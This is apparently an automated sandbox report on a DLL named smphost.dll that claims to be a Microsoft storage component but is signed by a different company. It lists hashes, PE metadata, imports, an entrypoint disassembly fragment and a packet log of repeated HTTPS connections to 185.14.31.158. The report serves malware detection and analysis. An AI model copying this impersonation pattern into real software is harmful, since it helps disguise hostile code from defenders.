Preview:	regfY...Y...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.BPw"...............................................................................................................................................................................................................................................................................................................................................b.[HvLE.^......Y.............k.......W..pN_.........0................... ..hbin................p.\..,..........nk,.".Rw"................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .".Rw"....... ........................... .......Z.......................Root........lf......Root....nk .".Rw"....................}.............. ..............................DeviceCensus.......................vk..................WritePermissionsCheck...

Static File Info

General

File type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Entropy (8bit):	6.319927202557722
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	smphost.dll
File size:	147656
MD5:	fc484855692f2a7d1eae090086a1eb72
SHA1:	2e9103747750b40835f58d9e57c2ab75eeaf25f6
SHA256:	e58b9bbb7bcdf3e901453b7b9c9e514fed1e53565e3280353dccc77cde26a98e
SHA512:	2f6b6e8aa82dc4aa61a540bae1d98682ec79e73ccfeaf9c273b053c2162f35207842f7ab2f1bc06e927d706ec88ecf209d2c57e86323c38fb43e9d694e624311
SSDEEP:	3072:biKjfYjd3b9fSCNq01bKrF5HiLCK08WA46tvTj:+QfYjBMCNcC+KlWuB3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........1.x.b.x.b.x.b...c.x.b...c`x.b...c.x.b...c.x.b...c.x.b...c.x.b...c.x.b.x.b.x.b...c.x.b...c.x.b...c.x.bRich.x.b...............

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General

Entrypoint:	0x100095e3
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x10000000
Subsystem:	windows cui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
DLL Characteristics:	DYNAMIC_BASE
Time Stamp:	0x61C2D9AE [Wed Dec 22 07:54:22 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	793636b04c2e2f8cfe97a0d2fa1b60e1

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	12/1/2021 4:00:00 PM 12/2/2022 3:59:59 PM
Subject Chain	CN=SATURN CONSULTANCY LTD, O=SATURN CONSULTANCY LTD, S=Essex, C=GB
Version:	3
Thumbprint MD5:	87CFAD0A22E828FF235A83CA03E90993
Thumbprint SHA-1:	430DBEFF2F6DF708B03354D5D07E78400CFED8E9
Thumbprint SHA-256:	44DAF53D607937F410C3D300100399514D0EE5B03487E7EAD16DFE324D2C5563
Serial:	205483936F360924E8D2A4EB6D3A9F31

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FB8DC464417h
call 00007FB8DC464819h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007FB8DC4642C3h
add esp, 0Ch
pop ebp
retn 000Ch
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 100153A0h
mov dword ptr [ecx], 10015398h
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FB8DC4643EFh
push 1001A634h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FB8DC4652E7h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FB8DC45DEDCh
push 1001A538h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FB8DC4652CAh
int3
push ebp
mov ebp, esp
and dword ptr [1001CFF0h], 00000000h
sub esp, 24h
or dword ptr [1001C010h], 01h
push 0000000Ah
call dword ptr [100150C4h]
test eax, eax
je 00007FB8DC4645BFh
and dword ptr [ebp-10h], 00000000h
xor eax, eax
push ebx
push esi
push edi
xor ecx, ecx
lea edi, dword ptr [ebp-24h]
push ebx
cpuid
mov esi, ebx
pop ebx
mov dword ptr [edi], eax
mov dword ptr [edi+04h], esi
mov dword ptr [edi+08h], ecx
xor ecx, ecx
mov dword ptr [edi+0Ch], edx
mov eax, dword ptr [ebp-24h]
mov edi, dword ptr [ebp-1Ch]
mov dword ptr [ebp-0Ch], eax
xor edi, 0065746Eh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1ab30	0x80	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1abb0	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x20000	0x5694	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x21a00	0x26c8	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1e000	0x132c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x19f0c	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x19f28	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x15000	0x1b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x13939	0x13a00	False	0.54204816879	data	6.52399222454	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x15000	0x65be	0x6600	False	0.417662377451	data	4.95436624069	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1c000	0x1a20	0xa00	False	0.171484375	DOS executable (block device driver)	2.41006083543	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0x1e000	0x132c	0x1400	False	0.748828125	data	6.45202754591	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x20000	0x5694	0x5800	False	0.205344460227	data	3.76919834084	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
MUI	0x2010c	0xf0	data	English	United States
WEVT_TEMPLATE	0x201fc	0x50ca	data	English	United States
RT_VERSION	0x252c8	0x3cc	data	English	United States

Imports

DLL	Import
KERNEL32.dll	DeleteCriticalSection, CreateMutexExW, GetPriorityClass, GetProcessId, GetVersion, GetProductInfo, InitializeCriticalSectionEx, FormatMessageA, FormatMessageW, GetConsoleCP, CreateFileW, CloseHandle, GetStringTypeW, SetFilePointerEx, GetProcessHeap, HeapSize, HeapReAlloc, HeapFree, HeapAlloc, GetLastError, RaiseException, DecodePointer, DisableThreadLibraryCalls, SetFileAttributesW, SetStdHandle, GetConsoleMode, GetConsoleOutputCP, WriteFile, FlushFileBuffers, FreeEnvironmentStringsW, GetEnvironmentStringsW, WideCharToMultiByte, MultiByteToWideChar, GetCommandLineW, GetCommandLineA, GetCPInfo, GetOEMCP, GetACP, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, GetCurrentProcess, TerminateProcess, OutputDebugStringW, EnterCriticalSection, LeaveCriticalSection, RtlUnwind, InterlockedFlushSList, SetLastError, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, LCMapStringW, GetStdHandle, GetFileType, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, WriteConsoleW
USER32.dll	CharNextW, CreatePopupMenu, GetMessageTime
GDI32.dll	TextOutA, FlattenPath, TextOutW
ADVAPI32.dll	RevertToSelf, IsValidSid, IsValidAcl, IsTokenRestricted, GetSidIdentifierAuthority, CveEventWrite
SHELL32.dll	DuplicateIcon
ole32.dll	CoGetCallerTID, CoCreateInstance, CoInitialize, CoTaskMemAlloc, OleInitialize, CoCancelCall
SHLWAPI.dll	SHStrDupA, SHStrDupW, SHGetThreadRef
RPCRT4.dll	UuidCreate, DceErrorInqTextA, RpcExceptionFilter

Exports

Name	Ordinal	Address
DllInstall	1	0x10008630
DllRegisterServer	2	0x10008a90
DllUnregisterServer	3	0x10008be0

Version Infos

Description	Data
LegalCopyright	Microsoft Corporation. All rights reserved.
InternalName	smphost.dll
FileVersion	10.0.21286.1000 (WinBuild.160101.0800)
CompanyName	Microsoft Corporation
ProductName	Microsoft Windows Operating System
ProductVersion	10.0.21286.1000
FileDescription	Storage Management Provider (SMP) host service
OriginalFilename	smphost.dll
Translation	0x0000 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 30, 2022 13:43:15.394882917 CET	49830	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:15.394932032 CET	443	49830	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:15.395061016 CET	49830	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:15.395589113 CET	49830	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:15.395632029 CET	443	49830	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:15.395706892 CET	49830	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:15.532660007 CET	49831	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:15.532708883 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:15.532799959 CET	49831	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:15.698055983 CET	49831	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:15.698086023 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:15.851042032 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:15.851142883 CET	49831	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:16.118767023 CET	49831	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:16.118799925 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.119225025 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.119281054 CET	49831	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:16.122791052 CET	49831	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:16.169876099 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.192837000 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.192890882 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.193063974 CET	49831	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:16.193083048 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.193205118 CET	49831	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:16.238173008 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.238213062 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.238414049 CET	49831	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:16.238430977 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.238543987 CET	49831	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:16.283485889 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.283524990 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.283693075 CET	49831	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:16.283710003 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.283778906 CET	49831	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:16.304004908 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.304044962 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.304290056 CET	49831	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:16.304305077 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.304426908 CET	49831	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:16.328831911 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.328881025 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.328974009 CET	49831	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:16.328986883 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.329060078 CET	49831	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:16.329245090 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.329272032 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.329354048 CET	49831	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:16.329363108 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.329432011 CET	49831	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:16.329689026 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.329714060 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.329819918 CET	49831	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:16.329830885 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.329905033 CET	49831	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:16.371095896 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.371133089 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.371258974 CET	49831	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:16.371273041 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.371345043 CET	49831	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:16.374042988 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.374075890 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.374217987 CET	49831	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:16.374228954 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.374301910 CET	49831	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:16.374335051 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.374438047 CET	49831	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:16.374447107 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.374459982 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:16.374528885 CET	49831	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:16.374931097 CET	49831	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:16.374948978 CET	443	49831	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:17.616753101 CET	49832	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:17.616843939 CET	443	49832	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:17.616949081 CET	49832	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:17.617564917 CET	49832	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:17.617652893 CET	443	49832	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:17.618009090 CET	49832	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:17.620316029 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:17.620383024 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:17.620496988 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:17.621151924 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:17.621181011 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:17.771239042 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:17.772213936 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:17.773065090 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:17.773087978 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:17.782651901 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:17.782686949 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:17.863405943 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:17.863440037 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:17.863614082 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:17.863656044 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:17.863679886 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:17.864300013 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:17.928632021 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:17.928672075 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:17.928893089 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:17.928934097 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:17.930656910 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:17.952539921 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:17.952578068 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:17.952872992 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:17.952914000 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:17.955857992 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:17.973274946 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:17.973313093 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:17.973622084 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:17.973651886 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:17.977101088 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:17.995999098 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:17.996038914 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:17.996270895 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:17.996294022 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:17.996427059 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:17.996871948 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:17.996901989 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:17.997010946 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:17.997024059 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:17.997088909 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:17.997136116 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.017728090 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.017756939 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.017883062 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.017904997 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.017918110 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.017961979 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.040029049 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.040062904 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.040184021 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.040215969 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.040258884 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.040287971 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.040299892 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.040313005 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.040318012 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.040344954 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.040385962 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.040412903 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.040468931 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.040481091 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.040503025 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.040535927 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.041183949 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.041207075 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.041268110 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.041280985 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.041327000 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.041354895 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.064588070 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.064619064 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.064764977 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.064806938 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.064831972 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.064861059 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.084758043 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.084796906 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.084886074 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.084914923 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.084939003 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.084964991 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.085046053 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.085078955 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.085129976 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.085141897 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.085165024 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.085197926 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.085370064 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.085407019 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.085453033 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.085465908 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.085501909 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.085514069 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.087538004 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.087584019 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.087635994 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.087651014 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.087671995 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.087718964 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.088284969 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.088329077 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.088370085 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.088382006 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.088403940 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.088447094 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.109664917 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.109730005 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.109922886 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.109966993 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.109991074 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.110054016 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.110224962 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.110285044 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.110332966 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.110347033 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.110399008 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.110433102 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.110821962 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.110879898 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.110932112 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.110944033 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.110989094 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.111017942 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.173266888 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.173336029 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.173398018 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.173444033 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.173465014 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.173516035 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.173676014 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.173751116 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.173763037 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.173784018 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.173803091 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.173831940 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.173840046 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.174417019 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.174477100 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.174505949 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.174527884 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.174542904 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.174550056 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.174575090 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.175076008 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.175132990 CET	443	49833	185.14.31.158	192.168.2.3
Jan 30, 2022 13:43:18.175163984 CET	49833	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:43:18.175177097 CET	443	49833	185.14.31.158	192.168.2.3
